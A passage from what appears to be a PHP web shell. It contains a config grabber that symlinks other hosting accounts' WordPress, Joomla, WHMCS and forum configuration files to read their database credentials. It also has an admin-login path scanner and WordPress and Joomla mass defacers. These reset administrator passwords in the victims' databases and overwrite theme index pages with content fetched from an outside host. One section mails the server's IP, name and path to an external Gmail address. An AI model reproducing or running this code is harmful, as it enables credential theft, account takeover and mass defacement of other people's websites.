  5147. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
  5148. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');
  5149. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
  5150. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
  5151. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
  5152. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
  5153. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
  5154. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
  5155. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');
  5156. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
  5157. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
  5158. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');
  5159. @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
  5160. @symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$user.'-ibproarcade.txt');
  5161. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
  5162. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');
  5163. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
  5164. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
  5165. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
  5166. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
  5167. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
  5168. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
  5169. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
  5170. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
  5171. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'-vb3-config.txt');
  5172. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vb1-config.txt');
  5173. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-includes-vb.txt');
  5174. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'-vbluttin-class_core.php.txt');
  5175. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'-vbluttin-class_core.php1.txt');
  5176. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'-vbluttin-class_core.php2.txt');
  5177. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
  5178. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
  5179. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
  5180. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
  5181. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
  5182. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
  5183. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
  5184. @symlink('/home/'.$user.'/public_html/supp/configuration.php',$user.'-supp.txt');
  5185. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-sucure.txt');
  5186. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-sucure-whm.txt');
  5187. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-sucure-whmcs.txt');
  5188. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'-cpanel.txt');
  5189. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-panel.txt');
  5190. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-host.txt');
  5191. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-hosting.txt');
  5192. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'-hosts.txt');
  5193. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
  5194. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
  5195. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-clients.txt');
  5196. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-client.txt');
  5197. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-clientes.txt');
  5198. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-client.txt');
  5199. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-clientsupport.txt');
  5200. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-billing.txt');
  5201. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-whm-manage.txt');
  5202. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-whm-my.txt');
  5203. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'-whm-myshop.txt');
  5204. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-zencart.txt');
  5205. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-shop-zencart.txt');
  5206. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-shop-ZCshop.txt');
  5207. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'-smf.txt');
  5208. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'-smf2.txt');
  5209. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'-smf-forum.txt');
  5210. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'-smf-forums.txt');
  5211. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'-up.txt');
  5212. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'-Nwahy.txt');
  5213. @symlink('/home/'.$user.'/public_html/up/includes/config.php',$user.'-up2.txt');
  5214. @symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-6.txt');
  5215. @symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
  5216. @symlink('/home/'.$user.'/public_html/connect.php',$user.'-PHP-Fusion.txt');
  5217. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-9.txt');
  5218. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-traidnt1.txt');
  5219. @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images.txt');
  5220. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'-Drupal.txt');
  5221. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'-1member.txt') ;
  5222. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-billings.txt') ;
  5223. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');
  5224. @symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.'-supports.txt');
  5225. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'-AM4SS-hosting.txt');
  5226. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'-hostbills-supports.txt');
  5227. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-hostbills-client.txt');
  5228. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-hostbills-support.txt');
  5229. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-hostbills-billing.txt');
  5230. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-hostbills-billings.txt');
  5231. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-hostbills-host.txt');
  5232. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'-hostbills-hosts.txt');
  5233. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-hostbills-hosting.txt');
  5234. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'-hostbills-hostings.txt');
  5235. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-hostbills.txt');
  5236. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-hostbills-hostbills.txt');
  5237. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'-hostbills-hostbill.txt');
  5238. }
  5239. echo "<center><br/><br/><a href='dm_grab'><nobr><span class='b9'>CHECK CONFIG GRABBER</span></nobr><br/></a><br/><br/>";
  5240. }
  5241. ?>
  5242.  
  5243. <?php }
  5244. # x=ascan
  5245. elseif(isset($_GET['x']) && ($_GET['x'] == 'ascan')){ ?>
  5246. <form action="?dn=<?php echo $pwd; ?>&amp;x=ascan" method="post">
  5247.  
  5248. <center><br/><br/><nobr><span class="b7">O=:[ ADMIN LOGIN</span> <span class="b8">PATH SCANNER ]:=O</nobr><br/><br/> <form method="POST"> Website : <input name="target" style="color:#FF0000;background-color:#000000" size="25" value="http://"><input type="submit" style="color:#FF0000;background-color:#000000" value=" >> "></form></center>
  5249.  
  5250. <?php
  5251. $target = $_POST['target'];
  5252. $admins = array('/admin',
  5253. '/adminweb',
  5254. '/safeadmin',
  5255. '/adminweb',
  5256. '/controlpanel',
  5257. '/cpanel',
  5258. '/admcp',
  5259. '/admin.asp',
  5260. '/sysadmin.php',
  5261. '/useradmin',
  5262. '/wp-admin',
  5263. '/webadmin',
  5264. '/SysAdmin',
  5265. '/administer',
  5266. '/administrator',
  5267. '/adm',
  5268. '/directadmin',
  5269. '/staradmin',
  5270. '/panel',
  5271. '/wp-login'
  5272. ,'/pureadmin',
  5273. '/webmaster',
  5274. '/ADMIN',
  5275. '/login',
  5276. '/paneldecontrol',
  5277. '/administrador',
  5278. '/admin.php',
  5279. '/login',
  5280. '/loign.php',
  5281. '/administrator.php',
  5282. '/admins.php',
  5283. '/logins',
  5284. '/admincp',
  5285. '/admincp.php');
  5286. foreach($admins as $admin) {
  5287. $jamban = ($target).($admin);
  5288. $get = @file_get_contents($jamban);
  5289. if($get) {
  5290. echo "<br>[+] FOUND : <a href='".$jamban."' target='_blank'>".$jamban."</a> [+]<br>";
  5291. }
  5292. }
  5293. ?>
  5294.  
  5295. <?php }
  5296. elseif(isset($_GET['x']) && ($_GET['x'] == 'wpmass')){ ?>
  5297. <form action="?y=<?php echo $pwd; ?>&amp;x=wpmass" method="post">
  5298. <?php
  5299. ini_set("display_errors", "0");
  5300. set_time_limit(0);
  5301. @session_start();
  5302. $base_path = dirname(__FILE__).'/';
  5303.  
  5304.  
  5305. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  5306. $ar0=explode($marqueurDebutLien, $text);
  5307. $ar1=explode($marqueurFinLien, $ar0[$i]);
  5308. return trim($ar1[0]);
  5309. }
  5310.  
  5311. function randomt() {
  5312. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  5313. srand((double)microtime()*1000000);
  5314. $i = 0;
  5315. $pass = '';
  5316. while ($i <= 7) {
  5317. $num = rand() % 33;
  5318. $tmp = substr($chars, $num, 1);
  5319. $pass = $pass . $tmp;
  5320. $i++;
  5321. }
  5322. return $pass;
  5323. }
  5324.  
  5325. function index_changer_wp($conf, $content) {
  5326. $output = '';
  5327. $dol = '$';
  5328. $username = entre2v2($conf,"define('DB_USER', '","');");
  5329. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
  5330. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
  5331. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
  5332. $host = entre2v2($conf,"define('DB_HOST', '","');");
  5333.  
  5334. $link=mysql_connect($host,$username,$password);
  5335. if($link) {
  5336. mysql_select_db($dbname,$link) ;
  5337. $dol = '$';
  5338. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '0a56f86a4ea789f555c2bdfafb61fd4a' WHERE `ID` = 1");
  5339. } else {
  5340. $output.= "[-] DB Error<br />";
  5341. }
  5342. if($req1) {
  5343.  
  5344. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  5345. $data = mysql_fetch_array($req);
  5346. $site_url=$data["option_value"];
  5347.  
  5348. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
  5349. $data = mysql_fetch_array($req);
  5350. $template = $data["option_value"];
  5351.  
  5352. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
  5353. $data = mysql_fetch_array($req);
  5354. $current_theme = $data["option_value"];
  5355.  
  5356. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  5357. $url2=$site_url."/wp-login.php";
  5358.  
  5359. $ch = curl_init();
  5360. curl_setopt($ch, CURLOPT_URL, $url2);
  5361. curl_setopt($ch, CURLOPT_POST, 1);
  5362. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=slymn123&rememberme=forever&wp-submit=Log In&testcookie=1");
  5363. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5364. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  5365. curl_setopt($ch, CURLOPT_HEADER, 0);
  5366. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  5367. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5368. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  5369. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  5370. $buffer = curl_exec($ch);
  5371.  
  5372. $pos = strpos($buffer,"action=logout");
  5373. if($pos === false) {
  5374. $output.= "[-] Giris Basarisiz<br />";
  5375. } else {
  5376. $output.= "[+] Giris Basarili<br />";
  5377. }
  5378.  
  5379. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  5380. curl_setopt($ch, CURLOPT_URL, $url2);
  5381. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  5382. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  5383. curl_setopt($ch, CURLOPT_HEADER, 0);
  5384. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5385. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  5386. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  5387. $buffer0 = curl_exec($ch);
  5388.  
  5389. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  5390. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  5391.  
  5392. if(substr_count($_file,"/index.php") != 0){
  5393. $output.= "[+] index.php CROT<br />";
  5394. } else {
  5395. $output.= "[-] index.php CROT<br />";
  5396. }
  5397.  
  5398. $url2=$site_url."/wp-admin/theme-editor.php";
  5399. curl_setopt($ch, CURLOPT_URL, $url2);
  5400. curl_setopt($ch, CURLOPT_POST, 1);
  5401. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  5402. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5403. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5404. curl_setopt($ch, CURLOPT_HEADER, 0);
  5405. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5406. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  5407. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  5408. $buffer = curl_exec($ch);
  5409. curl_close($ch);
  5410.  
  5411. $pos = strpos($buffer,'<div id="message" class="updated">');
  5412. $cond = 0;
  5413. if($pos === false) {
  5414. $output.= "[-] index.php CROT<br />";
  5415. } else {
  5416. $output.= "[+] index.php CROT<br />";
  5417. $cond = 1;
  5418. }
  5419. } else {
  5420. $output.= "[-] DB Error<br />";
  5421. }
  5422. global $base_path;
  5423. unlink($base_path.'COOKIE.txt');
  5424. return array('cond'=>$cond, 'output'=>$output);
  5425. }
  5426.  
  5427. function exec_mode_1($def_url) {
  5428.  
  5429. @mkdir('sym',0777);
  5430. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  5431. $fp = @fopen ('sym/.htaccess','w');
  5432. fwrite($fp, $wr);
  5433. @symlink('/','sym/root');
  5434. $dominios = @file_get_contents("/etc/named.conf");
  5435. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  5436. $out[1] = array_unique($out[1]);
  5437. $numero_dominios = count($out[1]);
  5438. echo "Toplam Site: $numero_dominios <br><br />";
  5439. $def = file_get_contents($def_url);
  5440. $def = urlencode($def);
  5441. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  5442. $output = fopen('defaced.html', 'a+');
  5443. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  5444. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  5445. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th>
  5446. <th>SID</th><th>Domain</th><th>Script</th><th>DM</th><th>dm</th></tr>';
  5447. $j = 1;
  5448. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  5449. for($i = $st; $i <= $numero_dominios; $i++)
  5450. {
  5451. $domain = $out[1][$i];
  5452. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  5453. $infos = @posix_getpwuid($dono_arquivo);
  5454.  
  5455. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  5456.  
  5457. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  5458.  
  5459. if($config02 && preg_match('/DB_NAME/i',$config02)){
  5460. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  5461. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  5462. $res = index_changer_wp($config02, $def);
  5463. echo '<td>'.$res['output'].'</td>';
  5464. if($res['cond']) {
  5465. echo '<td align="center"><span class="green">HACKED</span></td>';
  5466. fwrite($output, 'http://'.$domain."<br>");
  5467. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  5468. } else {
  5469. echo '<td align="center"><span class="red">BASARISIZ</span></td>';
  5470. }
  5471. echo '</tr>';
  5472. }
  5473. }
  5474. echo '</table>';
  5475. echo '<hr/>';
  5476. echo 'TOTAL Deface = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
  5477.  
  5478. }
  5479. echo '<!DOCTYPE html>
  5480. <html>
  5481. <head>
  5482. <title>WP Mass Defacer</title>
  5483. <script type="text/javascript">
  5484. function change() {
  5485. if(document.getElementById(\'rcd\').checked == true) {
  5486. document.getElementById(\'tra\').style.display = \'\';
  5487. } else {
  5488. document.getElementById(\'tra\').style.display = \'none\';
  5489. }
  5490. }
  5491. function hide() {
  5492. document.getElementById(\'tra\').style.display = \'none\';
  5493. }
  5494. </script>
  5495. </head>
  5496. <body>
  5497. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  5498. <h2 style="color:#0066FF;text-align: center;">Wordpress Mass Defacer</h2>';
  5499.  
  5500.  
  5501. if(!isset($_POST['form_action'])){ echo '<div align="center">
  5502. <form action="" method="post">
  5503. <input type="hidden" name="form_action" value="1"><br>index url:
  5504. <input type="text" style="color:#FF0000;background-color:#000000" name="indexadresi" value="http://site.com/index.html" /><br>
  5505. <input class=submit style="color:#FF0000;background-color:#000000" type="submit" value="!! START !!" name="Submit">
  5506. </form>
  5507. </div>';
  5508. }
  5509. echo '<div align="center">';
  5510. if($_POST['form_action'] == 1) {
  5511. exec_mode_1($_POST['indexadresi']);
  5512. }
  5513. echo '</div>
  5514. </div>
  5515. </body>
  5516. </html>';
  5517. ?>
  5518.  
  5519.  
  5520.  
  5521. <?php }
  5522. elseif(isset($_GET['x']) && ($_GET['x'] == 'jomass')){ ?>
  5523. <form action="?y=<?php echo $pwd; ?>&amp;x=jomass" method="post">
  5524. <html>
  5525. <?
  5526.  
  5527.  
  5528. ini_set("display_errors", "0");
  5529. set_time_limit(0);
  5530. @session_start();
  5531. echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
  5532.  
  5533. //mail feature
  5534. $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
  5535. mail('proxyhoax@gmail.com',$_SERVER['SERVER_ADDR'],$body);
  5536.  
  5537. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
  5538.  
  5539. //create symlink of / to /sym/root/
  5540. @mkdir('sym',0777);
  5541. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  5542. $fp = @fopen ('sym/.htaccess','w');
  5543. fwrite($fp, $wr);
  5544. @symlink('/','sym/root');
  5545. //collecting site names
  5546. $text=file_get_contents($base_url.'/sym/root/var/named/');
  5547. $ar = explode('<li><a href="', $text);
  5548. for($vi=2;$vi < count($ar);$vi++)
  5549. {
  5550. $var1 = strtok($ar[$vi], " ");
  5551. $var1 = substr($var1,0,-2);
  5552. $old=('.db');
  5553. $new=('');
  5554. $sites = str_replace($old , $new , $var1);
  5555. $filename = 'sites.txt';
  5556. $fp = fopen($filename, "a+");
  5557. $write = fputs($fp, $sites."\n");
  5558. fclose($fp);
  5559. }
  5560.  
  5561. //collecting domainuser names for sites
  5562. $domainusers=file('sites.txt');
  5563. foreach ($domainusers as $domainuser) {
  5564. $textexec=("ls -la /etc/valiases/".$domainuser);
  5565. $exec=exec($textexec);
  5566. $filename = 'lsla.txt';
  5567. $fp = fopen($filename, "a+");
  5568. $write = fputs($fp, $exec."\n");
  5569. fclose($fp);
  5570. }
  5571.  
  5572. //creating final domain and domain user list
  5573. $lsla=file('lsla.txt');
  5574. foreach ($lsla as $finaldom) {
  5575. $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
  5576. $site=substr(strstr($finaldom, '/etc/valiases'),14);
  5577.  
  5578. $filename = 'bhung.txt';
  5579. $fp = fopen($filename, "a+");
  5580. $write = fputs($fp, $user.":". $site." ");
  5581. fclose($fp);
  5582.  
  5583. }
  5584.  
  5585. $f=file_get_contents('bhung.txt');
  5586. $finals=explode(" ",$f);
  5587. foreach ($finals as $final){
  5588. $strlen=('6');
  5589. $dr=strlen ($final);
  5590. if ($dr < $strlen) {
  5591.  
  5592. $filename = 'faltu.txt';
  5593. $fp = fopen($filename, "a");
  5594. $write = fputs($fp, $final);
  5595. fclose($fp);
  5596. }
  5597. else {
  5598. $filename = 'gold.txt';
  5599. $fp = fopen($filename, "a");
  5600. $write = fputs($fp, $final."\n");
  5601. fclose($fp);
  5602. }
  5603.  
  5604. }
  5605. //delete ajaira text files
  5606. unlink ('bhung.txt');
  5607. unlink ('faltu.txt');
  5608. unlink ('lsla.txt');
  5609. unlink ('sites.txt');
  5610.  
  5611. $h=file_get_contents('http://dmzone-defacer.tk/index.html');
  5612. $url=($base_url);
  5613. $a=file($base_url.'/gold.txt');
  5614. echo ("<center><table border=1 cellspacing=1 cellpading=1>
  5615. <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
  5616.  
  5617. foreach ($a as $final) {
  5618. list($user, $site_url) = explode(":", $final);
  5619. $site_urlto = substr($site_url, 0, -1);
  5620. $url2=($url."/sym/root/home/".$user."/public_html/configuration.php");
  5621. $configs=file_get_contents($url2);
  5622. $old=('$');
  5623. $new=('hax0rsistz');
  5624. $configfile = str_replace($old , $new , $configs);
  5625. $username=entre2v2($configfile, "hax0rsistzuser = '","';");
  5626. $password=entre2v2($configfile, "hax0rsistzpassword = '","';");
  5627. $dbname=entre2v2($configfile, "hax0rsistzdb = '","';");
  5628. $dbprefix=entre2v2($configfile, "hax0rsistzdbprefix = '","';");
  5629.  
  5630. $strlendbprefix= strlen ($dbprefix);
  5631. if ($strlendbprefix > 2) {
  5632. $link=mysql_connect("localhost",$username,$password) ;
  5633.  
  5634. mysql_select_db($dbname,$link) ;
  5635.  
  5636. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='Yabod1' , password = 'af9083d4b82dbc0745b124db3b3cf15d:M0WuLowO4rtRTddG' where usertype='Super Administrator'");
  5637.  
  5638. //checking pass change
  5639. $reqpass=('af9083d4b82dbc0745b124db3b3cf15d:M0WuLowO4rtRTddG');
  5640. $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='Yabod1'");
  5641. $showpass=mysql_fetch_array ($checkpass);
  5642. if ($showpass[0]== $reqpass) {
  5643.  
  5644. $filename = 'passchanged.txt';
  5645. $fp = fopen($filename, "a+");
  5646. $write = fputs($fp, $site_url."\n");
  5647. fclose($fp);
  5648. //upto this alright
  5649. $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
  5650.  
  5651.  
  5652. $co=randomt();
  5653.  
  5654. if ( $req )
  5655. {
  5656.  
  5657. $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
  5658. $data = mysql_fetch_array($req);
  5659. $template_name=$data["template"];
  5660.  
  5661. $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
  5662. $data = mysql_fetch_array($req);
  5663. $template_id=$data["extension_id"];
  5664.  
  5665. $urlto=$site_urlto."/administrator/index.php";
  5666.  
  5667. $ch = curl_init();
  5668. curl_setopt($ch, CURLOPT_URL, $urlto);
  5669. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5670. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5671. curl_setopt($ch, CURLOPT_HEADER, 1);
  5672. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5673. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5674. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5675.  
  5676.  
  5677. $buffer = curl_exec($ch);
  5678.  
  5679. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  5680. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  5681.  
  5682. ///////////////////////////
  5683. $urlto=$site_urlto."/administrator/index.php";
  5684. $ch = curl_init();
  5685. curl_setopt($ch, CURLOPT_URL, $urlto);
  5686. curl_setopt($ch, CURLOPT_POST, 1);
  5687. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
  5688. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5689. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5690. curl_setopt($ch, CURLOPT_HEADER, 0);
  5691. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5692. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5693. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5694. $buffer = curl_exec($ch);
  5695.  
  5696. $pos = strpos($buffer,"com_config");
  5697. if($pos === false) {
  5698.  
  5699. }
  5700. else {
  5701. }
  5702. ///////////////////////////
  5703. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  5704. $ch = curl_init();
  5705. curl_setopt($ch, CURLOPT_URL, $urlto);
  5706. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5707. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5708. curl_setopt($ch, CURLOPT_HEADER, 0);
  5709. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5710. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5711. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5712. $buffer = curl_exec($ch);
  5713.  
  5714. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  5715. if($hidden2) {
  5716. }
  5717. else {
  5718.  
  5719. }
  5720. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
  5721.  
  5722. $ch = curl_init();
  5723. curl_setopt($ch, CURLOPT_URL, $urlto);
  5724. curl_setopt($ch, CURLOPT_POST, 1);
  5725. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  5726.  
  5727. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  5728. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  5729. curl_setopt($ch, CURLOPT_HEADER, 0);
  5730. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  5731. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  5732. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  5733. $buffer = curl_exec($ch);
  5734.  
  5735. $pos = strpos($buffer,'<dd class="message message">');
